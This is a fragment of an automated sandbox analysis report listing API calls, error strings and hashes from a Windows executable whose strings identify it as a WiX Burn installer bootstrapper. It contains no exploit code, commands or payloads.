                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ClassErrorLast$CreateRegisterUnregisterValueWindow
                                                                                                                                                              • String ID: Failed to create window.$Failed to register window.$Unexpected return value from message pump.$WixBurnMessageWindow$uithread.cpp
                                                                                                                                                              • API String ID: 213125376-288575659
                                                                                                                                                              • Opcode ID: e6b771e6484b41b455862e8279b3bf161a28e7ec1b46594ed2ea463cc38fbcfa
                                                                                                                                                              • Instruction ID: 5a025db65b3f11860dabc91f9f35c0234760079584206c53f7406595ddf6efba
                                                                                                                                                              • Opcode Fuzzy Hash: e6b771e6484b41b455862e8279b3bf161a28e7ec1b46594ed2ea463cc38fbcfa
                                                                                                                                                              • Instruction Fuzzy Hash: 5741C472A01215EFDB619BA0DC45ADEBFB8FF04720F214126F915EA340D734A940DBA1
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to allocate memory for pseudo bundle payload hash., xrefs: 007EC9AD
                                                                                                                                                              • Failed to allocate space for burn package payload inside of passthrough bundle., xrefs: 007EC7B4
                                                                                                                                                              • Failed to copy download source for passthrough pseudo bundle., xrefs: 007EC98F
                                                                                                                                                              • Failed to copy uninstall arguments for passthrough bundle package, xrefs: 007ECAAC
                                                                                                                                                              • Failed to copy local source path for passthrough pseudo bundle., xrefs: 007EC9B7
                                                                                                                                                              • Failed to copy key for passthrough pseudo bundle., xrefs: 007EC988
                                                                                                                                                              • Failed to copy key for passthrough pseudo bundle payload., xrefs: 007EC9C5
                                                                                                                                                              • Failed to recreate command-line arguments., xrefs: 007ECA43
                                                                                                                                                              • Failed to copy filename for passthrough pseudo bundle., xrefs: 007EC9BE
                                                                                                                                                              • pseudobundle.cpp, xrefs: 007EC7A8, 007EC9A1, 007EC9DB
                                                                                                                                                              • Failed to copy install arguments for passthrough bundle package, xrefs: 007ECA62
                                                                                                                                                              • Failed to copy related arguments for passthrough bundle package, xrefs: 007ECA82
                                                                                                                                                              • Failed to allocate space for burn payload inside of related bundle struct, xrefs: 007EC9E7
                                                                                                                                                              • Failed to copy cache id for passthrough pseudo bundle., xrefs: 007ECA05
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$AllocateProcess
                                                                                                                                                              • String ID: Failed to allocate memory for pseudo bundle payload hash.$Failed to allocate space for burn package payload inside of passthrough bundle.$Failed to allocate space for burn payload inside of related bundle struct$Failed to copy cache id for passthrough pseudo bundle.$Failed to copy download source for passthrough pseudo bundle.$Failed to copy filename for passthrough pseudo bundle.$Failed to copy install arguments for passthrough bundle package$Failed to copy key for passthrough pseudo bundle payload.$Failed to copy key for passthrough pseudo bundle.$Failed to copy local source path for passthrough pseudo bundle.$Failed to copy related arguments for passthrough bundle package$Failed to copy uninstall arguments for passthrough bundle package$Failed to recreate command-line arguments.$pseudobundle.cpp
                                                                                                                                                              • API String ID: 1357844191-115096447
                                                                                                                                                              • Opcode ID: 3bb51db7263fb76beef53eda0ced1fff2906cece2c48ae9be086069e93405caf
                                                                                                                                                              • Instruction ID: f665da568d93e18f5fdb3a2e6adbbdfbae3a55765e73e09f30a2ac1e0411b072
                                                                                                                                                              • Opcode Fuzzy Hash: 3bb51db7263fb76beef53eda0ced1fff2906cece2c48ae9be086069e93405caf
                                                                                                                                                              • Instruction Fuzzy Hash: F8B16879A01656EFCB12DF28C881F55BBA5FF08710F108169ED14AB352CB39E862DF90
                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 007EDE61
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to create BITS job., xrefs: 007EDEF0
                                                                                                                                                              • Failed to add file to BITS job., xrefs: 007EDF2E
                                                                                                                                                              • Failed to download BITS job., xrefs: 007EDFF8
                                                                                                                                                              • Failed to set credentials for BITS job., xrefs: 007EDF0F
                                                                                                                                                              • Failed to set callback interface for BITS job., xrefs: 007EDF99
                                                                                                                                                              • Failed to copy download URL., xrefs: 007EDEA8
                                                                                                                                                              • bitsengine.cpp, xrefs: 007EDE77, 007EDF6A
                                                                                                                                                              • Failed while waiting for BITS download., xrefs: 007EE012
                                                                                                                                                              • Failed to complete BITS job., xrefs: 007EE00B
                                                                                                                                                              • Failed to initialize BITS job callback., xrefs: 007EDF82
                                                                                                                                                              • Falied to start BITS job., xrefs: 007EE019
                                                                                                                                                              • Invalid BITS engine URL: %ls, xrefs: 007EDE83
                                                                                                                                                              • Failed to create BITS job callback., xrefs: 007EDF74
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: lstrlen
                                                                                                                                                              • String ID: Failed to add file to BITS job.$Failed to complete BITS job.$Failed to copy download URL.$Failed to create BITS job callback.$Failed to create BITS job.$Failed to download BITS job.$Failed to initialize BITS job callback.$Failed to set callback interface for BITS job.$Failed to set credentials for BITS job.$Failed while waiting for BITS download.$Falied to start BITS job.$Invalid BITS engine URL: %ls$bitsengine.cpp
                                                                                                                                                              • API String ID: 1659193697-2382896028
APIs
• _MREFOpen@16.MSPDB140-MSVCRT ref: 007CBCE5
• CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000200,00000000,?,00000044,?,?,?,?,?), ref: 007CBDF2
• GetLastError.KERNEL32(?,?,?,?), ref: 007CBDFC
• WaitForInputIdle.USER32(?,?), ref: 007CBE50
• CloseHandle.KERNEL32(?,?,?), ref: 007CBE9B
• CloseHandle.KERNEL32(?,?,?), ref: 007CBEA8
Strings
Similarity
• API ID: CloseHandle$CreateErrorIdleInputLastOpen@16ProcessWait
• String ID: "%ls"$"%ls" %s$D$Failed to CreateProcess on path: %ls$Failed to create executable command.$Failed to create obfuscated executable command.$Failed to format argument string.$Failed to format obfuscated argument string.$approvedexe.cpp
• API String ID: 155678114-2737401750
APIs
• _MREFOpen@16.MSPDB140-MSVCRT ref: 007CA2B3
• _MREFOpen@16.MSPDB140-MSVCRT ref: 007CA30E
• RegQueryValueExW.ADVAPI32(000002C0,00000100,00000000,000002C0,00000000,00000000,000002C0,?,00000100,00000000,?,00000000,?,000002C0,000002C0,?), ref: 007CA32F
• RegCloseKey.ADVAPI32(00000000,00000100,00000000,000002C0,00000100,00000000,000002C0), ref: 007CA405
Strings
• Failed to format key string., xrefs: 007CA2BE
• search.cpp, xrefs: 007CA360
• RegistrySearchExists failed: ID '%ls', HRESULT 0x%x, xrefs: 007CA3DD
• Registry value not found. Key = '%ls', Value = '%ls', xrefs: 007CA37A
• Failed to open registry key. Key = '%ls', xrefs: 007CA3C7
• Failed to query registry key value., xrefs: 007CA36A
• Failed to set variable., xrefs: 007CA3BD
• Registry key not found. Key = '%ls', xrefs: 007CA396
• Failed to format value string., xrefs: 007CA319
Similarity
• API ID: Open@16$CloseQueryValue
• String ID: Failed to format key string.$Failed to format value string.$Failed to open registry key. Key = '%ls'$Failed to query registry key value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchExists failed: ID '%ls', HRESULT 0x%x$search.cpp
• API String ID: 2702208347-46557908
APIs
• GetModuleHandleW.KERNEL32(00000000,00000000,00000000,?,007CBAFB,00000008,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 007CB210
• GetLastError.KERNEL32(?,007CBAFB,00000008,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 007CB21C
Strings
Similarity
• API ID: ErrorHandleLastModule
• String ID: .wix$.wixburn$Bundle guid didn't match the guid in the PE Header in memory.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get module handle to process.$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$burn$section.cpp
• API String ID: 4242514867-926796631
APIs
• GetModuleHandleExW.KERNEL32(00000000,ntdll,?), ref: 007C699B
• GetLastError.KERNEL32 ref: 007C69A5
• GetProcAddress.KERNEL32(?,RtlGetVersion), ref: 007C69E8
• GetLastError.KERNEL32 ref: 007C69F2
• FreeLibrary.KERNEL32(00000000,00000000,?), ref: 007C6B03
Strings
Similarity
• API ID: ErrorLast$AddressFreeHandleLibraryModuleProc
• String ID: Failed to get OS info.$Failed to locate NTDLL.$Failed to locate RtlGetVersion.$Failed to set variant value.$RtlGetVersion$ntdll$variable.cpp
• API String ID: 3057421322-109962352
APIs
• TlsAlloc.KERNEL32(?,00000001,00000001,00000000,00000000,?,?,?,007C5466,?,?,?,?), ref: 007C4920
• GetLastError.KERNEL32(?,?,?,007C5466,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 007C4931
• ReleaseMutex.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007C4A6E
• CloseHandle.KERNEL32(?,?,?,?,007C5466,?,?,?,?,?,?,?,?,?,?,?), ref: 007C4A77
Strings
• Failed to set elevated pipe into thread local storage for logging., xrefs: 007C49A8
• Failed to allocate thread local storage for logging., xrefs: 007C495F
• Failed to create the message window., xrefs: 007C49CC
• comres.dll, xrefs: 007C49DD
• Failed to connect to unelevated process., xrefs: 007C4916
• engine.cpp, xrefs: 007C4955, 007C499E
• Failed to pump messages from parent process., xrefs: 007C4A42
Similarity
• API ID: AllocCloseErrorHandleLastMutexRelease
• String ID: Failed to allocate thread local storage for logging.$Failed to connect to unelevated process.$Failed to create the message window.$Failed to pump messages from parent process.$Failed to set elevated pipe into thread local storage for logging.$comres.dll$engine.cpp
• API String ID: 687263955-1790235126
APIs
• GetTempPathW.KERNEL32(00000104,?,?,00000000,crypt32.dll), ref: 007D3BA2
• GetLastError.KERNEL32(?,00000000,crypt32.dll), ref: 007D3BAC
• GetCurrentProcessId.KERNEL32(?,?,?,00000104,?,?,00000000,crypt32.dll), ref: 007D3C15
• ProcessIdToSessionId.KERNEL32(00000000,?,00000000,crypt32.dll), ref: 007D3C1C
• CompareStringW.KERNEL32(00000000,00000000,?,?,?,?,?,7FFFFFFF,?,?,?,?,?,00000000,crypt32.dll), ref: 007D3CA6
Strings
• Failed to get length of temp folder., xrefs: 007D3C06
• Failed to get temp folder., xrefs: 007D3BDA
• Failed to format session id as a string., xrefs: 007D3C4A
• %u\, xrefs: 007D3C36
• Failed to get length of session id string., xrefs: 007D3C71
• Failed to copy temp folder., xrefs: 007D3CCF
• crypt32.dll, xrefs: 007D3B61
• logging.cpp, xrefs: 007D3BD0
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: Process$CompareCurrentErrorLastPathSessionStringTemp
• String ID: %u\$Failed to copy temp folder.$Failed to format session id as a string.$Failed to get length of session id string.$Failed to get length of temp folder.$Failed to get temp folder.$crypt32.dll$logging.cpp
• API String ID: 2407829081-3274134579
• Opcode ID: ee9e6d75ba4253f68292c02d6bfddc90881a3653dc8bd60a2b6d0e3db56b49ce
• Instruction ID: 18b449231d6e8813ac63891fd7d28215c65718ac04d3da6a9e7422b74d3af080
• Opcode Fuzzy Hash: ee9e6d75ba4253f68292c02d6bfddc90881a3653dc8bd60a2b6d0e3db56b49ce
• Instruction Fuzzy Hash: 1E416072D8123DABCB219B549C49FDA7778AF14710F1001A6F918B7381EA789F858BE1
APIs
• EnterCriticalSection.KERNEL32(00000000,00000000,00000000,?,000000B9,00000002,?,00000000,00000000,00000000,00000000,00000001,00000000,00000002,000000B9), ref: 007C7FC2
• LeaveCriticalSection.KERNEL32(?), ref: 007C81EA
Strings
• Failed to get numeric., xrefs: 007C81BC
• Failed to write literal flag., xrefs: 007C81C3
• Failed to write variable value as number., xrefs: 007C8194
• feclient.dll, xrefs: 007C809D, 007C80F3, 007C8134
• Failed to write variable value as string., xrefs: 007C81AE
• Failed to get string., xrefs: 007C81B5
• Failed to write included flag., xrefs: 007C81D8
• Failed to get version., xrefs: 007C819B
• Unsupported variable type., xrefs: 007C81A7
• Failed to write variable count., xrefs: 007C7FDD
• Failed to write variable value type., xrefs: 007C81CA
• Failed to write variable name., xrefs: 007C81D1
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: CriticalSection$EnterLeave
• String ID: Failed to get numeric.$Failed to get string.$Failed to get version.$Failed to write included flag.$Failed to write literal flag.$Failed to write variable count.$Failed to write variable name.$Failed to write variable value as number.$Failed to write variable value as string.$Failed to write variable value type.$Unsupported variable type.$feclient.dll
• API String ID: 3168844106-2118673349
• Opcode ID: e2be792f49ebcd760b72d329628e2c0b9f181323a64f218144cab37362d3b812
• Instruction ID: 977b889a97037fa4653692891f4221f82cbc389e12b213f814a9b03a8fb528f7
• Opcode Fuzzy Hash: e2be792f49ebcd760b72d329628e2c0b9f181323a64f218144cab37362d3b812
• Instruction Fuzzy Hash: 9771927290062DEBCB929EA4CC45FAE7BA4FF04350F14416EF910A7290DF38DD569B92
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000000,?,007DA843,00000000,00000000,00000000,?,00000000), ref: 007D97CD
• GetLastError.KERNEL32(?,007DA843,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 007D97DD
  • Part of subcall function 00804102: Sleep.KERNEL32(?,00000000,?,007D85EE,?,?,00000001,00000003,000007D0,?,?,?,?,?,?,007C4DBC), ref: 00804119
• CloseHandle.KERNEL32(00000000,00000000,00000001,00000003,000007D0,?,00000000,00000000,00000000), ref: 007D98E9
Strings
• Failed to move %ls to %ls, xrefs: 007D98C1
• Failed to open payload in working path: %ls, xrefs: 007D980C
• cache.cpp, xrefs: 007D9801
• Moving, xrefs: 007D987F
• Copying, xrefs: 007D9888, 007D9893
• Failed to verify payload signature: %ls, xrefs: 007D9838
• Failed to copy %ls to %ls, xrefs: 007D98D7
• %ls payload from working path '%ls' to path '%ls', xrefs: 007D9894
• Failed to verify payload hash: %ls, xrefs: 007D9875
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: CloseCreateErrorFileHandleLastSleep
• String ID: %ls payload from working path '%ls' to path '%ls'$Copying$Failed to copy %ls to %ls$Failed to move %ls to %ls$Failed to open payload in working path: %ls$Failed to verify payload hash: %ls$Failed to verify payload signature: %ls$Moving$cache.cpp
• API String ID: 1275171361-1604654059
• Opcode ID: 3ec92195b9e1747dedb8ac8f02a2a55f3df2715632a60216bc05b6fbcd1c2bb6
• Instruction ID: fde2f8cf076c756ec2cfe9e81547527d4f427862a260338dda4fd08d9dbe060a
• Opcode Fuzzy Hash: 3ec92195b9e1747dedb8ac8f02a2a55f3df2715632a60216bc05b6fbcd1c2bb6
• Instruction Fuzzy Hash: 6331DF71A40634BBDA3126558C4AF6B293CFF42F60F010126FF15BB381D669DC00A6E1
APIs
• GetCurrentProcess.KERNEL32(00000000), ref: 007C65FC
  • Part of subcall function 00800ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,007C5EB2,00000000), ref: 00800AE0
  • Part of subcall function 00800ACC: GetProcAddress.KERNEL32(00000000), ref: 00800AE7
  • Part of subcall function 00800ACC: GetLastError.KERNEL32(?,?,?,007C5EB2,00000000), ref: 00800AFE
• GetSystemDirectoryW.KERNEL32(?,00000104), ref: 007C6628
• GetLastError.KERNEL32 ref: 007C6636
• GetSystemWow64DirectoryW.KERNEL32(?,00000104,00000000), ref: 007C666E
• GetLastError.KERNEL32 ref: 007C6678
• GetSystemDirectoryW.KERNEL32(?,00000104), ref: 007C66BB
• GetLastError.KERNEL32 ref: 007C66C5
Strings
• Failed to get 32-bit system folder., xrefs: 007C66A6
• Failed to get 64-bit system folder., xrefs: 007C6664
• Failed to set system folder variant value., xrefs: 007C6724
• Failed to backslash terminate system folder., xrefs: 007C6708
• variable.cpp, xrefs: 007C665A, 007C669C
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: ErrorLast$DirectorySystem$AddressCurrentHandleModuleProcProcessWow64
• String ID: Failed to backslash terminate system folder.$Failed to get 32-bit system folder.$Failed to get 64-bit system folder.$Failed to set system folder variant value.$variable.cpp
• API String ID: 325818893-1590374846
• Opcode ID: b15e8aa668086875536b48c25e45fb80fa6e949ede2431fab28329829824e141
• Instruction ID: a1cef2beb9c899d8f0b4a83cbb7bb54d6bf78218dff39ad1c7925ec505393646
• Opcode Fuzzy Hash: b15e8aa668086875536b48c25e45fb80fa6e949ede2431fab28329829824e141
• Instruction Fuzzy Hash: 7731E272D41235A7DB309BA58C8DF9A77A8AF00760F01456DBD14FB280EB7CDD408AE1
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 007D3AA6: RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,007D3FB5,feclient.dll,?,00000000,?,?,?,007C4B12), ref: 007D3B42
                                                                                                                                                              • Sleep.KERNEL32(000007D0,00000001,feclient.dll,?,00000000,?,?,?,007C4B12,?,?,0080B488,?,00000001,00000000,00000000), ref: 007D404C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: CloseSleep
• String ID: Failed to copy full log path to prefix.$Failed to copy log extension to extension.$Failed to copy log path to prefix.$Failed to get current directory.$Failed to get non-session specific TEMP folder.$Failed to open log: %ls$Setup$clbcatq.dll$crypt32.dll$feclient.dll$log$msasn1.dll
• API String ID: 2834455192-2673269691
APIs
• EnterCriticalSection.KERNEL32(00000001,?,00000000,007C5445,00000006,?,007C82B9,?,?,?,00000000,00000000,00000001), ref: 007C6DC8
  • Part of subcall function 007C56A9: CompareStringW.KERNELBASE(0000007F,00001000,?,000000FF,version.dll,000000FF,?,?,00000000,007C6595,007C6595,?,007C563D,?,?,00000000), ref: 007C56E5
  • Part of subcall function 007C56A9: GetLastError.KERNEL32(?,007C563D,?,?,00000000,?,?,007C6595,?,007C7F02,?,?,?,?,?), ref: 007C5714
• LeaveCriticalSection.KERNEL32(00000001,?,00000000,00000001,00000000,00000000,?,007C82B9), ref: 007C6F59
Strings
• Setting version variable '%ls' to value '%hu.%hu.%hu.%hu', xrefs: 007C6ED0
• Attempt to set built-in variable value: %ls, xrefs: 007C6E56
• Failed to set value of variable: %ls, xrefs: 007C6F41
• Setting string variable '%ls' to value '%ls', xrefs: 007C6EED
• Unsetting variable '%ls', xrefs: 007C6F15
• Setting numeric variable '%ls' to value %lld, xrefs: 007C6EFA
• Failed to insert variable '%ls'., xrefs: 007C6E0D
• Setting variable failed: ID '%ls', HRESULT 0x%x, xrefs: 007C6F6B
• Failed to find variable value '%ls'., xrefs: 007C6DE3
• variable.cpp, xrefs: 007C6E4B
• Setting hidden variable '%ls', xrefs: 007C6E86
Similarity
• API ID: CriticalSection$CompareEnterErrorLastLeaveString
• String ID: Attempt to set built-in variable value: %ls$Failed to find variable value '%ls'.$Failed to insert variable '%ls'.$Failed to set value of variable: %ls$Setting hidden variable '%ls'$Setting numeric variable '%ls' to value %lld$Setting string variable '%ls' to value '%ls'$Setting variable failed: ID '%ls', HRESULT 0x%x$Setting version variable '%ls' to value '%hu.%hu.%hu.%hu'$Unsetting variable '%ls'$variable.cpp
• API String ID: 2716280545-445000439
APIs
• CompareStringW.KERNEL32(00000000,00000001,006C0064,000000FF,002C002B,000000FF,?,00000000,?,wininet.dll,?,crypt32.dll,?,?,?,00000000), ref: 007D2C8A
Strings
• Failed to allocate registration action., xrefs: 007D2CF3
• Failed to add dependent bundle provider key to ignore dependents., xrefs: 007D2DF4
• Failed to add dependents ignored from command-line., xrefs: 007D2D3F
• Failed to create the string dictionary., xrefs: 007D2CC3
• Failed to add self-dependent to ignore dependents., xrefs: 007D2D0E
• wininet.dll, xrefs: 007D2ED7
• Failed to add registration action for self dependent., xrefs: 007D2F57
• Failed to add registration action for dependent related bundle., xrefs: 007D2F8E
• Failed to check for remaining dependents during planning., xrefs: 007D2E30
• crypt32.dll, xrefs: 007D2CD5, 007D2DCF, 007D2EC4, 007D2F39
Similarity
• API ID: CompareString
• String ID: Failed to add dependent bundle provider key to ignore dependents.$Failed to add dependents ignored from command-line.$Failed to add registration action for dependent related bundle.$Failed to add registration action for self dependent.$Failed to add self-dependent to ignore dependents.$Failed to allocate registration action.$Failed to check for remaining dependents during planning.$Failed to create the string dictionary.$crypt32.dll$wininet.dll
• API String ID: 1825529933-1705955799
APIs
• EnterCriticalSection.KERNEL32(?), ref: 007DF947
• UuidCreate.RPCRT4(?), ref: 007DFA2A
• StringFromGUID2.OLE32(?,?,00000027), ref: 007DFA4B
• LeaveCriticalSection.KERNEL32(?,?), ref: 007DFAF4
Strings
• Failed to set update bundle., xrefs: 007DFACE
• Failed to default local update source, xrefs: 007DF9B7
• Failed to recreate command-line for update bundle., xrefs: 007DFA12
• EngineForApplication.cpp, xrefs: 007DFA60
• update\%ls, xrefs: 007DF9A3
• Failed to create bundle update guid., xrefs: 007DFA37
• Failed to convert bundle update guid into string., xrefs: 007DFA6A
Similarity
• API ID: CriticalSection$CreateEnterFromLeaveStringUuid
• String ID: EngineForApplication.cpp$Failed to convert bundle update guid into string.$Failed to create bundle update guid.$Failed to default local update source$Failed to recreate command-line for update bundle.$Failed to set update bundle.$update\%ls
• API String ID: 171215650-2594647487
APIs
• IsWindow.USER32(?), ref: 007C4C64
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 007C4C75
Strings
• Failed to check global conditions, xrefs: 007C4B49
• Failed to create the message window., xrefs: 007C4B98
• Failed to set layout directory variable to value provided from command-line., xrefs: 007C4C06
• Failed to set action variables., xrefs: 007C4BC4
• Failed to open log., xrefs: 007C4B18
• Failed to query registration., xrefs: 007C4BAE
• Failed while running , xrefs: 007C4C2A
• WixBundleLayoutDirectory, xrefs: 007C4BF5
• Failed to set registration variables., xrefs: 007C4BDE
Similarity
• API ID: MessagePostWindow
• String ID: Failed to check global conditions$Failed to create the message window.$Failed to open log.$Failed to query registration.$Failed to set action variables.$Failed to set layout directory variable to value provided from command-line.$Failed to set registration variables.$Failed while running $WixBundleLayoutDirectory
• API String ID: 3618638489-3051724725
APIs
  • Part of subcall function 007C394F: GetProcessHeap.KERNEL32(?,000001C7,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3960
  • Part of subcall function 007C394F: RtlAllocateHeap.NTDLL(00000000,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3967
• EnterCriticalSection.KERNEL32(?,00000014,00000001), ref: 007DF06E
• LeaveCriticalSection.KERNEL32(?), ref: 007DF19B
Strings
• Failed to copy the arguments., xrefs: 007DF12D
• EngineForApplication.cpp, xrefs: 007DF17C
• Failed to copy the id., xrefs: 007DF100
• Failed to post launch approved exe message., xrefs: 007DF186
• Engine is active, cannot change engine state., xrefs: 007DF089
• UX requested unknown approved exe with id: %ls, xrefs: 007DF0CE
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                               • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                               • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                               • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                               • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CriticalHeapSection$AllocateEnterLeaveProcess
                                                                                                                                                              • String ID: Engine is active, cannot change engine state.$EngineForApplication.cpp$Failed to copy the arguments.$Failed to copy the id.$Failed to post launch approved exe message.$UX requested unknown approved exe with id: %ls
                                                                                                                                                              • API String ID: 1367039788-528931743
                                                                                                                                                              • Opcode ID: 80fdea629176d3bc93cbc1fc848215db833a158010ca086762ac926c0c5cb610
                                                                                                                                                              • Instruction ID: 4a31272070b339c763643bfc8c0185002c894cd43f65ebc144c0337a5e891453
                                                                                                                                                              • Opcode Fuzzy Hash: 80fdea629176d3bc93cbc1fc848215db833a158010ca086762ac926c0c5cb610
                                                                                                                                                              • Instruction Fuzzy Hash: 7C31C532641229EBDB219F64DC09F9A77B9EF04720B154426FD05EB351EB3ADD008790
                                                                                                                                                              APIs
                                                                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000000,?,007DA7D4,00000000,00000000,00000000,?,00000000), ref: 007D96B8
                                                                                                                                                              • GetLastError.KERNEL32(?,007DA7D4,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 007D96C6
                                                                                                                                                                • Part of subcall function 00804102: Sleep.KERNEL32(?,00000000,?,007D85EE,?,?,00000001,00000003,000007D0,?,?,?,?,?,?,007C4DBC), ref: 00804119
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,00000001,00000003,000007D0,?,00000000,00000000,00000000), ref: 007D97A4
                                                                                                                                                              Strings
